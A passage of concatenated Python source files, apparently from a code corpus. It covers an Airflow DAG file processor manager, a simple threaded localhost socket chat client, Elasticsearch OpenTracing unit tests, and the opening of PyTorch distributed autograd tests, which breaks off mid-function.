signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up DAG file processors to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
# In sync mode we want timeout=None -- wait forever until a message is received
poll_time = None # type: Optional[float]
if self._async_mode:
poll_time = 0.0
self.log.debug("Starting DagFileProcessorManager in async mode")
else:
poll_time = None
self.log.debug("Starting DagFileProcessorManager in sync mode")
while True:
loop_start_time = time.time()
if self._signal_conn.poll(poll_time):
agent_signal = self._signal_conn.recv()
self.log.debug("Recived %s singal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_HEARTBEAT:
# continue the loop to parse dags
pass
elif not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
# are told to (as that would open another connection to the
# SQLite DB which isn't a good practice
continue
self._refresh_dag_dir()
simple_dags = self.heartbeat()
for simple_dag in simple_dags:
self._signal_conn.send(simple_dag)
if not self._async_mode:
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
simple_dags = self.collect_results()
for simple_dag in simple_dags:
self._signal_conn.send(simple_dag)
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None
for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
dag_parsing_stat = DagParsingStat(self._file_paths,
max_runs_reached,
all_files_processed,
)
self._signal_conn.send(dag_parsing_stat)
if max_runs_reached:
self.log.info("Exiting dag parsing loop as all files "
"have been processed %s times", self._max_runs)
break
if self._async_mode:
loop_duration = time.time() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
def _refresh_dag_dir(self):
"""
Refresh file paths from dag dir if we haven't done it for too long.
"""
elapsed_time_since_refresh = (timezone.utcnow() -
self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = timezone.utcnow()
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors()
except Exception:
self.log.exception("Error removing old import errors")
def _print_stat(self):
"""
Occasionally print out stats about how fast the files are getting processed
"""
if ((timezone.utcnow() - self.last_stat_print_time).total_seconds() >
self.print_stats_interval):
if len(self._file_paths) > 0:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = timezone.utcnow()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(
~errors.ImportError.filename.in_(self._file_paths)
)
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:type known_file_paths: list[unicode]
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path",
"PID",
"Runtime",
"Last Runtime",
"Last Run"]
rows = []
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
if last_runtime:
Stats.gauge(
'dag_processing.last_runtime.{}'.format(file_name),
last_runtime
)
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = ((timezone.utcnow() - processor_start_time).total_seconds()
if processor_start_time else None)
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (timezone.utcnow() - last_run).total_seconds()
Stats.gauge(
'dag_processing.last_run.seconds_ago.{}'.format(file_name),
seconds_ago
)
rows.append((file_path,
processor_pid,
runtime,
last_runtime,
last_run))
# Sort by longest last runtime. (Can't sort None values in python3)
rows = sorted(rows, key=lambda x: x[3] or 0.0)
formatted_rows = []
for file_path, pid, runtime, last_runtime, last_run in rows:
formatted_rows.append((file_path,
pid,
"{:.2f}s".format(runtime)
if runtime else None,
"{:.2f}s".format(last_runtime)
if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S")
if last_run else None))
log_str = ("\n" +
"=" * 80 +
"\n" +
"DAG File Processing Stats\n\n" +
tabulate(formatted_rows, headers=headers) +
"\n" +
"=" * 80)
self.log.info(log_str)
@property
def file_paths(self):
return self._file_paths
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_runtime(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the current runtime (in seconds) of the process that's
processing the specified file or None if the file is not currently
being processed
"""
if file_path in self._processors:
return (timezone.utcnow() - self._processors[file_path].start_time)\
.total_seconds()
return None
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
return self._last_runtime.get(file_path)
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
return self._last_finish_time.get(file_path)
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:type new_file_paths: list[unicode]
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue
if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
processor.terminate()
self._processors = filtered_processors
def wait_until_finished(self):
"""
Sleeps until all the processors are done.
"""
for processor in self._processors.values():
while not processor.done:
time.sleep(0.1)
def collect_results(self):
"""
Collect the result from any finished DAG processors
:return: a list of SimpleDags that were produced by processors that
have finished since the last time this was called
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
self._kill_timed_out_processors()
finished_processors = {}
""":type : dict[unicode, AbstractDagFileProcessor]"""
running_processors = {}
""":type : dict[unicode, AbstractDagFileProcessor]"""
for file_path, processor in self._processors.items():
if processor.done:
self.log.debug("Processor for %s finished", file_path)
now = timezone.utcnow()
finished_processors[file_path] = processor
self._last_runtime[file_path] = (now -
processor.start_time).total_seconds()
self._last_finish_time[file_path] = now
self._run_count[file_path] += 1
else:
running_processors[file_path] = processor
self._processors = running_processors
self.log.debug("%s/%s DAG parsing processes running",
len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing",
len(self._file_path_queue))
# Collect all the DAGs that were found in the processed files
simple_dags = []
for file_path, processor in finished_processors.items():
if processor.result is None:
self.log.warning(
"Processor for %s exited with return code %s.",
processor.file_path, processor.exit_code
)
else:
for simple_dag in processor.result:
simple_dags.append(simple_dag)
return simple_dags
def heartbeat(self):
"""
This should be periodically called by the manager loop. This method will
kick off new processes to process DAG definition files and read the
results from the finished processors.
:return: a list of SimpleDags that were produced by processors that
have finished since the last time this was called
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
simple_dags = self.collect_results()
# Generate more file paths to process if we processed all the files
# already.
if len(self._file_path_queue) == 0:
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
file_paths_recently_processed = []
for file_path in self._file_paths:
last_finish_time = self.get_last_finish_time(file_path)
if (last_finish_time is not None and
(now - last_finish_time).total_seconds() <
self._file_process_interval):
file_paths_recently_processed.append(file_path)
files_paths_at_run_limit = [file_path
for file_path, num_runs in self._run_count.items()
if num_runs == self._max_runs]
files_paths_to_queue = list(set(self._file_paths) -
set(file_paths_in_progress) -
set(file_paths_recently_processed) -
set(files_paths_at_run_limit))
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path, processor.start_time.isoformat()
)
self.log.debug(
"Queuing the following files for processing:\n\t%s",
"\n\t".join(files_paths_to_queue)
)
self._file_path_queue.extend(files_paths_to_queue)
# Start more processors if we have enough slots and files to process
while (self._parallelism - len(self._processors) > 0 and
len(self._file_path_queue) > 0):
file_path = self._file_path_queue.pop(0)
processor = self._processor_factory(file_path)
processor.start()
self.log.debug(
"Started a process (PID: %s) to generate tasks for %s",
processor.pid, file_path
)
self._processors[file_path] = processor
# Update heartbeat count.
self._run_count[self._heart_beat_key] += 1
return simple_dags
def _kill_timed_out_processors(self):
"""
Kill any file processors that timeout to defend against process hangs.
"""
now = timezone.utcnow()
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.info(
"Processor for %s with PID %s started at %s has timed out, "
"killing it.",
processor.file_path, processor.pid, processor.start_time.isoformat())
Stats.incr('dag_file_processor_timeouts', 1, 1)
processor.kill()
def max_runs_reached(self):
"""
:return: whether all file paths have been processed max_runs times
"""
if self._max_runs == -1: # Unlimited runs.
return False
for file_path in self._file_paths:
if self._run_count[file_path] < self._max_runs:
return False
if self._run_count[self._heart_beat_key] < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
them as orphaned.
"""
pids_to_kill = self.get_all_pids()
if len(pids_to_kill) > 0:
# First try SIGTERM
this_process = psutil.Process(os.getpid())
# Only check child processes to ensure that we don't have a case
# where we kill the wrong process because a child process died
# but the PID got reused.
child_processes = [x for x in this_process.children(recursive=True)
if x.is_running() and x.pid in pids_to_kill]
for child in child_processes:
self.log.info("Terminating child PID: %s", child.pid)
child.terminate()
# TODO: Remove magic number
timeout = 5
self.log.info("Waiting up to %s seconds for processes to exit...", timeout)
try:
psutil.wait_procs(
child_processes, timeout=timeout,
callback=lambda x: self.log.info('Terminated PID %s', x.pid))
except psutil.TimeoutExpired:
self.log.debug("Ran out of time while waiting for processes to exit")
# Then SIGKILL
child_processes = [x for x in this_process.children(recursive=True)
if x.is_running() and x.pid in pids_to_kill]
if len(child_processes) > 0:
self.log.info("SIGKILL processes that did not terminate gracefully")
for child in child_processes:
self.log.info("Killing child PID: %s", child.pid)
child.kill()
child.wait()
|
cl_4.py
|
import socket
import time
from threading import Thread
import sys
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn.connect(("127.0.0.1", 14903))
def receive():
while True:
data = conn.recv(16384)
udata = data.decode("utf-8")
if not data:
break
print(udata)
def send_mes():
while True:
message = input()
if message:
conn.send(bytes(message, "utf-8"))
if message == "quit":
sys.exit()
break
receive_thread = Thread(target=receive)
send_thread = Thread(target=send_mes)
receive_thread.start()
send_thread.start()
send_thread.join()
receive_thread.join()
|
test_lowlevel.py
|
import datetime
import unittest
import threading
import time
from elasticsearch import Elasticsearch
from elasticsearch_opentracing import TracingTransport, init_tracing, \
enable_tracing, disable_tracing, set_active_span, clear_active_span, \
get_active_span, _clear_tracing_state
from mock import patch
from .dummies import *
@patch('elasticsearch.Transport.perform_request')
class TestTracing(unittest.TestCase):
def setUp(self):
self.tracer = DummyTracer()
self.es = Elasticsearch(transport_class=TracingTransport)
def tearDown(self):
_clear_tracing_state()
def test_tracing(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False, prefix='Prod007')
mock_perform_req.return_value = {'hits': []}
main_span = DummySpan()
set_active_span(main_span)
enable_tracing()
body = {"any": "data", "timestamp": datetime.datetime.now()}
res = self.es.index(index='test-index', doc_type='tweet', id=1,
body=body, params={'refresh': True})
self.assertEqual(mock_perform_req.return_value, res)
self.assertEqual(1, len(self.tracer.spans))
self.assertEqual(self.tracer.spans[0].operation_name, 'Prod007/test-index/tweet/1')
self.assertEqual(self.tracer.spans[0].is_finished, True)
self.assertEqual(self.tracer.spans[0].child_of, main_span)
self.assertEqual(self.tracer.spans[0].tags, {
'component': 'elasticsearch-py',
'db.type': 'elasticsearch',
'db.statement': body,
'span.kind': 'client',
'elasticsearch.url': '/test-index/tweet/1',
'elasticsearch.method': 'PUT',
'elasticsearch.params': {'refresh': True},
})
def test_trace_none(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
set_active_span(DummySpan())
self.es.get(index='test-index', doc_type='tweet', id=3)
self.assertEqual(0, len(self.tracer.spans))
def test_trace_all_requests(self, mock_perform_req):
init_tracing(self.tracer)
for i in range(3):
self.es.get(index='test-index', doc_type='tweet', id=i)
self.assertEqual(3, len(self.tracer.spans))
self.assertTrue(all(map(lambda x: x.is_finished, self.tracer.spans)))
enable_tracing()
disable_tracing() # Shouldnt prevent further tracing
self.es.get(index='test-index', doc_type='tweet', id=4)
self.assertEqual(4, len(self.tracer.spans))
self.assertTrue(all(map(lambda x: x.is_finished, self.tracer.spans)))
self.assertTrue(all(map(lambda x: x.child_of is None, self.tracer.spans)))
def test_trace_all_requests_span(self, mock_perform_req):
init_tracing(self.tracer)
main_span = DummySpan()
set_active_span(main_span)
for i in range(3):
self.es.get(index='test-index', doc_type='tweet', id=i)
self.assertEqual(3, len(self.tracer.spans))
self.assertTrue(all(map(lambda x: x.is_finished, self.tracer.spans)))
self.assertTrue(all(map(lambda x: x.child_of == main_span, self.tracer.spans)))
def test_trace_bool_payload(self, mock_perform_req):
init_tracing(self.tracer)
# Some operations, as creating an index, return a bool value.
mock_perform_req.return_value = False
mapping = "{'properties': {'body': {}}}"
res = self.es.indices.create('test-index', body=mapping)
self.assertFalse(res)
self.assertEqual(1, len(self.tracer.spans))
self.assertEqual(self.tracer.spans[0].is_finished, True)
def test_trace_result_tags(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
mock_perform_req.return_value = {
'found': False,
'timed_out': True,
'took': 7
}
enable_tracing()
self.es.get(index='test-index', doc_type='tweet', id=1)
self.assertEqual(1, len(self.tracer.spans))
self.assertTrue(all(map(lambda x: x.is_finished, self.tracer.spans)))
self.assertEqual('False', self.tracer.spans[0].tags['elasticsearch.found'])
self.assertEqual('True', self.tracer.spans[0].tags['elasticsearch.timed_out'])
self.assertEqual('7', self.tracer.spans[0].tags['elasticsearch.took'])
def test_disable_tracing(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
enable_tracing()
disable_tracing()
self.assertEqual(0, len(self.tracer.spans))
self.es.get(index='test-index', doc_type='tweet', id=1)
self.assertEqual(0, len(self.tracer.spans))
disable_tracing() # shouldn't cause a problem
def test_disable_tracing_span(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
main_span = DummySpan()
set_active_span(main_span)
# Make sure the active span was preserved
enable_tracing()
disable_tracing()
self.assertEqual(main_span, get_active_span())
# Make sure it was preserved, by tracing.
enable_tracing()
self.es.get(index='test-index', doc_type='tweet', id=1)
self.assertEqual(1, len(self.tracer.spans))
self.assertEqual(main_span, self.tracer.spans[0].child_of)
def test_clear_span(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
enable_tracing()
set_active_span(DummySpan())
clear_active_span()
self.es.get(index='test-index', doc_type='tweet', id=1)
self.assertEqual(1, len(self.tracer.spans))
self.assertEqual(None, self.tracer.spans[0].child_of)
def test_trace_error(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
main_span = DummySpan()
set_active_span(main_span)
enable_tracing()
mock_perform_req.side_effect = RuntimeError()
try:
self.es.get(index='test-index', doc_type='tweet', id=1)
except RuntimeError as exc:
catched_exc = exc
self.assertEqual(1, len(self.tracer.spans))
self.assertEqual(True, self.tracer.spans[0].is_finished)
self.assertEqual(main_span, self.tracer.spans[0].child_of)
self.assertEqual('true', self.tracer.spans[0].tags['error'])
self.assertEqual(catched_exc, self.tracer.spans[0].tags['error.object'])
def test_trace_after_error(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
enable_tracing()
mock_perform_req.side_effect = RuntimeError()
try:
self.es.get(index='test-index', doc_type='tweet', id=1)
except RuntimeError as exc:
pass
self.tracer.clear()
# Should not cause any further tracing
mock_perform_req.side_effect = None
self.es.get(index='test-index', doc_type='tweet', id=1)
self.assertEqual(0, len(self.tracer.spans))
def test_multithreading(self, mock_perform_req):
init_tracing(self.tracer)
ev = threading.Event()
# 1. Start tracing from thread-1; make thread-2 wait
# 2. Trace something from thread-2, make thread-1 before finishing.
# 3. Check the spans got different parents, and are in the expected order.
def target1():
set_active_span(DummySpan())
enable_tracing()
self.es.get(index='test-index', doc_type='tweet', id=1)
ev.set()
ev.wait()
disable_tracing()
def target2():
ev.wait()
enable_tracing()
self.es.get(index='test-index', doc_type='tweet', id=2)
ev.set()
disable_tracing()
t1 = threading.Thread(target=target1)
t2 = threading.Thread(target=target2)
t1.start()
t2.start()
t1.join()
t2.join()
self.assertEqual(2, len(self.tracer.spans))
self.assertTrue(all(map(lambda x: x.is_finished, self.tracer.spans)))
self.assertEqual([False, True], map(lambda x: x.child_of is None, self.tracer.spans))
|
dist_autograd_test.py
|
import sys
import threading
import time
import unittest
from enum import Enum
import random
import torch
import torch.nn as nn
from datetime import timedelta
import torch.distributed as dist
import torch.distributed.autograd as dist_autograd
import torch.distributed.rpc as rpc
import torch.testing._internal.dist_utils
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from torch.distributed.rpc import RRef
from torch.testing._internal.common_utils import IS_MACOS
from torch.testing._internal.dist_utils import (
dist_init,
initialize_pg,
wait_until_node_failure,
worker_name,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_distributed import skip_if_lt_x_gpu
# Right now we test up to 3-layer nested rpc calls.
# rpc_done[1] and ctx_ids[1] represent rpc is done in prev rank, and context id
# sent from prev rank respectively.
# rpc_done[2] and ctx_ids[2] represents for prev of prev rank.
# rpc_done[3] and ctx_ids[3] represents for prev of prev of prev rank.
# rpc_done[0] and ctx_ids[0] represents for current rank, but mostly not used.
rpc_done = [False, False, False, False]
ctx_ids = [-1, -1, -1, -1]
known_context_ids = set()
requires_grad_tensor = torch.ones(3, 3, requires_grad=True)
# Send rpc done info and context_id to
# dst_rank = (self.rank + rank_distance) % self.world_size
# we don't need a lock here since the GIL is held while executing remote
# python UDFs, so access is serialized across several workers.
def _set_rpc_done(ctx_id, rank_distance):
global rpc_done
global ctx_ids
global known_context_ids
rpc_done[rank_distance] = True
ctx_ids[rank_distance] = ctx_id
known_context_ids.add(ctx_id)
def _check_rpc_done(rank_distance):
while not rpc_done[rank_distance]:
time.sleep(0.1)
def _torch_ones(sizes, requires_grad=False):
return torch.ones(sizes, requires_grad=requires_grad)
# This method must be called on the rref owner, and verifies that the grad of
# rref tensor equals to the given grad.
def _compare_owner_value(context_id, rref, grad):
grads = dist_autograd.get_gradients(context_id)
return torch.equal(grads[rref.local_value()], grad)
def create_tensor():
return torch.ones((3, 3), requires_grad=True)
@torch.jit.script
def create_torchscript_tensor() -> torch.Tensor:
return torch.ones((3, 3)).requires_grad_()
def my_py_add(t1, t2):
return torch.add(t1, t2)
def my_scalar_add(a, b):
return a + b
def my_rref_add(rref_t1, t2):
ret = torch.add(rref_t1.local_value(), t2)
return ret
@torch.jit.script
def my_script_add(t1, t2):
return torch.add(t1, t2)
@torch.jit.script
def my_script_ref_add(ref_t1: RRef[torch.Tensor], t2: torch.Tensor) -> torch.Tensor:
t1 = ref_t1.to_here()
return torch.add(t1, t2)
def my_nested_rref_add(dst, rref_t1, t2):
return rpc.rpc_sync(dst, my_rref_add, args=(rref_t1, t2))
def ret_requires_grad():
return requires_grad_tensor
def my_py_nested_call(t1, t2, dst, world_size, hops):
next_dst = (dst + 1) % world_size
if hops > 0:
return rpc.rpc_sync(
worker_name(next_dst),
my_py_nested_call,
args=(t1, t2, next_dst, world_size, hops - 1),
)
else:
return rpc.rpc_sync(worker_name(next_dst), my_py_add, args=(t1, t2))
# after dist autograd context is cleaned up, it should be cleaned up on other
# nodes. This helper allows timeout_seconds for those RPCs to be completed, and
# ensures that all the contexts have been cleaned up in that timeframe.any
def _all_contexts_cleaned_up(timeout_seconds=10):
global known_context_ids
start = time.time()
context_id_to_raised = set()
while (
time.time() - start < timeout_seconds
and context_id_to_raised != known_context_ids
):
for context_id in known_context_ids:
try:
dist_autograd._retrieve_context(context_id)
except RuntimeError:
context_id_to_raised.add(context_id)
# all contexts have been cleaned up if trying to retrieve any context resulted in a RuntimeError.
success = context_id_to_raised == known_context_ids
return success
# This function creates a dis atugorad context, run rpc_sync on the given ps,
# and then blocks until the ps has verified the grads are correctly accumulated.
def _run_trainer(rref_t1, t2, ps, rank_diff):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(ps, my_rref_add, args=(rref_t1, t2))
dist_autograd.backward(context_id, [ret.sum()])
# prevent deleting dist autograd context
rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
# This function is the same as _run_trainer, except rpc calls torchscript
# function "my_script_ref_add" instead of python funciton "my_rref_add"
def _run_trainer_torchscript(rref_t1, t2, ps, rank_diff):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(ps, my_script_ref_add, args=(rref_t1, t2))
dist_autograd.backward(context_id, [ret.sum()])
# prevent deleting dist autograd context
rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
class SimulateBackwardError(Function):
_simulate_error = True
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if SimulateBackwardError._simulate_error:
raise Exception("Simulate error on backward pass")
else:
return input
class ExecMode(Enum):
LOCAL = 1 # Run the operation locally.
RPC_SYNC = 2 # Run the operation using rpc_sync
REMOTE = 3 # Run the operation using remote.
RPC_ASYNC = 4 # Run the operation using rpc_async
# Common utils for both CPU and CUDA test suites
class CommonDistAutogradTest(RpcAgentTestFixture):
def _exec_func_with_dst(self, dst, exec_mode, method, *args):
if ExecMode.LOCAL == exec_mode:
if len(args) == 1 and isinstance(args[0], list):
return method(*args[0])
return method(*args)
elif ExecMode.RPC_SYNC == exec_mode:
return rpc.rpc_sync(worker_name(dst), method, args=(args))
elif ExecMode.REMOTE == exec_mode:
return rpc.remote(worker_name(dst), method, args=(args)).to_here()
elif ExecMode.RPC_ASYNC == exec_mode:
fut = rpc.rpc_async(worker_name(dst), method, args=(args))
return fut.wait()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
def _exec_func(self, exec_mode, method, *args):
return self._exec_func_with_dst(
self._next_rank(), exec_mode, method, *args
)
def _next_rank(self):
if hasattr(self, "dst_rank"):
self.dst_rank = (self.dst_rank + 1) % self.world_size
if self.dst_rank == self.rank:
return self._next_rank()
else:
self.dst_rank = (self.rank + 1) % self.world_size
return self.dst_rank
def _check_rpc_done(self, rank_distance):
_check_rpc_done(rank_distance)
def _verify_backwards(self, exec_mode, tensors, context_id, local_grads, *args):
if exec_mode == ExecMode.LOCAL:
torch.autograd.backward(tensors)
return [arg.grad for arg in args]
else:
self._verify_backwards_remote(tensors, context_id, local_grads, *args)
def _verify_backwards_remote(self, tensors, context_id, local_grads, *args):
dist_autograd.backward(context_id, tensors)
# Verify grads were accumulated appropriately.
grads = dist_autograd.get_gradients(context_id)
nargs = len(args)
ngrads = 0
for i in range(0, nargs):
if local_grads[i] is not None:
self.assertIn(args[i], grads)
self.assertEqual(local_grads[i], grads[args[i]])
ngrads += 1
else:
self.assertNotIn(args[i], grads)
self.assertEqual(ngrads, len(grads))
class DistAutogradTest(CommonDistAutogradTest):
@dist_init
def test_autograd_context(self):
# Verify max possible id.
max_auto_increment = 281474976710655
self.assertEqual(
max_auto_increment + (self.worker_id << 48), dist_autograd._get_max_id()
)
context_ids = []
for i in range(200):
with dist_autograd.context() as context_id:
self.assertEqual(
context_id,
dist_autograd._retrieve_context(context_id)._context_id(),
)
# First 16 bits should be worker_id.
self.assertEqual(self.worker_id, context_id >> 48)
context_ids.append(context_id)
for context_id in context_ids:
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
dist_autograd._retrieve_context(context_id)
@dist_init
def test_nested_context(self):
with dist_autograd.context() as context_id:
# Nested contexts not supported.
with self.assertRaisesRegex(
RuntimeError, "Already have an autograd context id for this thread"
):
with dist_autograd.context() as context_id:
pass
# For current context, this rank sends t1 and t2 tensors to dst_rank,
# then get t3 = torch.add(t1, t2) result tensor.
# For the current context in this rank, it expects graph like this:
# send function:
# rpcSendBackward
# / \
# t1.AccumulateGrad t2.AccumulateGrad
#
# recv function:
#
# |
# t3.rpcRecvBackward
#
def _verify_graph_for_first_rpc_call(
self, send_function, recv_function, t1, t2, ret
):
# Retrieve the next functions in the graph.
next_funcs = send_function.next_functions
self.assertEqual(2, len(next_funcs))
# We should now hit t1 and t2 in the autograd graph.
self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[0][0].name())
self.assertEqual(t1, next_funcs[0][0].variable)
self.assertEqual(0, next_funcs[0][1])
self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[1][0].name())
self.assertEqual(t2, next_funcs[1][0].variable)
self.assertEqual(0, next_funcs[1][1])
# Test recv functions.
self.assertEqual(ret.grad_fn, recv_function)
# For a context passed from previous nested chain calls, this rank
# receives two tensors t1 and t2, executes torch.add(t1, t2) and sends
# result tensor t3 back.
# For this context in this rank, it expects graph like this:
# send and recv functions:
# rpcSendBackward
# |
# t3.AddBackward0
# / \
# t1.recvRpcBackward t2.recvRpcBackward
def _verify_graph_for_rpc_call_exec(self, send_function):
# Verify next function is AddBackward0
next_funcs = send_function.next_functions
self.assertEqual(1, len(next_funcs))
add_backward_fn = next_funcs[0][0]
self.assertEqual("AddBackward0", add_backward_fn.name())
# Verify the next two functions are the same recv backward function.
next_funcs = add_backward_fn.next_functions
self.assertEqual(2, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
)
self.assertEqual(next_funcs[0][0], next_funcs[1][0])
# For a context passed from previous nested chain calls, this rank
# receives two tensors t1 and t2, forwards t1 and t2 tensors using
# nested rpc call to next dst. In return route, receive result tensor t3
# from next dst and forwarding t3 back to previous calls.
# For this context in this rank, it expects graph like this:
# send and recv functions for receiving and forwarding t1 and t2:
# rpcSendBackward
# / \
# t1.recvRpcBackward t2.recvRpcBackward
# send and recv functions for receiving and forwarding t3:
# rpcSendBackward
# |
# t3.recvRpcBackward
def _verify_graph_for_nested_rpc_call(self, ctx):
send_functions = ctx._send_functions()
self.assertEqual(2, len(send_functions))
# For send function when making nest rpc call,
# next functions of the send function are two recv functions
# for received two tensors from previous call
next_funcs = list(send_functions.values())[0].next_functions
self.assertEqual(2, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
)
self.assertEqual(next_funcs[0][0], next_funcs[1][0])
# For send function when returning resonpose to previous call
# next function of the send function is the recv function
# for received tensor result returned from nested call
next_funcs = list(send_functions.values())[1].next_functions
self.assertEqual(1, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
def _test_graph(self, fn, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(worker_name(dst_rank), fn, args=(t1, t2))
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), fn, args=(t1, t2)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# Verify graph for current context id.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(1, len(recv_functions))
self._verify_graph_for_first_rpc_call(
